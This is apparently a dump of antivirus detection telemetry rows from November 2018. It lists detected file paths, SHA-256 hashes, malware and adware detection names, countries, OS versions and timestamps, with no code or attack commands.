  Row(detection=Row(filename='wwerfxgg.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\WwErfXGg.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00001e3e', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00001e3e', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:45:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050702-1a916a45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050702-1A916A45', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-163234-41d82abb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e52765e\\AVSCAN-20181102-162910-34DFFC7A\\AVSCAN-20181102-163234-41D82ABB', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055254-82cb9436', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055254-82CB9436', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130505-4e23d03d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130505-4E23D03D', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090201-79ef23dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a95d6325\\AVSCAN-20181102-084022-64C18A0E\\AVSCAN-20181102-090201-79EF23DC', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-100230-bbfff2c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03aa77bb\\AVSCAN-20181102-100026-ACE63AD3\\AVSCAN-20181102-100230-BBFFF2C8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6bbada565c292d9f92dd7bdf3a9a87ad84ad76ef259c6462ed674488ae9fc572', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:02:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX24.219\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX24.219\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T04:26:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053101-74b8543a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053101-74B8543A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0005951.exe', filepath='D:\\System Volume Information\\_restore{6B806EF6-C686-49F4-AC4B-5CBDA4B84782}\\RP14\\A0005951.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='6af293f256ca34b0f5e0c5e66cfb4ce9963626a647116e76d5e2612fb213b5fe', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:45:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:56:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00002004', filepath='C:\\Windows\\Temp\\tmp0000010e\\tmp00002004', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T17:53:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053203-995dba41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053203-995DBA41', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kpmltjih.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\kpmlTJIH.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050735-2e72761c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050735-2E72761C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051546-5313846d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051546-5313846D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3904304, timestamp='2018-11-02T22:51:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060253-e7ea5b25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060253-E7EA5B25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061851-2329cc81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061851-2329CC81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055028-2c215d18', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055028-2C215D18', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055040-3373237d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055040-3373237D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:50:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062134-845f8b00', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062134-845F8B00', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061726-f06eff7f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061726-F06EFF7F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055123-4cba6f44', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055123-4CBA6F44', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061824-12e964a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061824-12E964A6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055337-9c81682d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055337-9C81682D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061928-397a8beb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061928-397A8BEB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062539-16722f10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062539-16722F10', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054423-529f23b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054423-529F23B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050912-683026ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050912-683026AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053654-46c9aa96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053654-46C9AA96', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052430-8b3a6a17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052430-8B3A6A17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054036-cb3c5e71', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054036-CB3C5E71', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060509-3910d179', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060509-3910D179', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054939-0f1d0352', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054939-0F1D0352', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055529-dfa27d8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055529-DFA27D8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061615-c64f26e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061615-C64F26E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052345-706e181c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052345-706E181C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052728-f5bdb729', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052728-F5BDB729', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061323-5fc022ad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061323-5FC022AD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062444-f5b567b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062444-F5B567B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053205-9a7d0ac7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053205-9A7D0AC7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051916-d063b11c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051916-D063B11C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060612-5ec2242b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060612-5EC2242B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051424-223d204b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051424-223D204B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054140-f19eefdc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054140-F19EEFDC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054127-e9d46d37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054127-E9D46D37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055744-2fdb54d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055744-2FDB54D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053404-e1a7f51f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053404-E1A7F51F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062216-9d543037', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062216-9D543037', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055708-1ac693ec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055708-1AC693EC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062224-a2488020', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062224-A2488020', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:23Z'), dt=datetime.date(2018, 11, 2)),
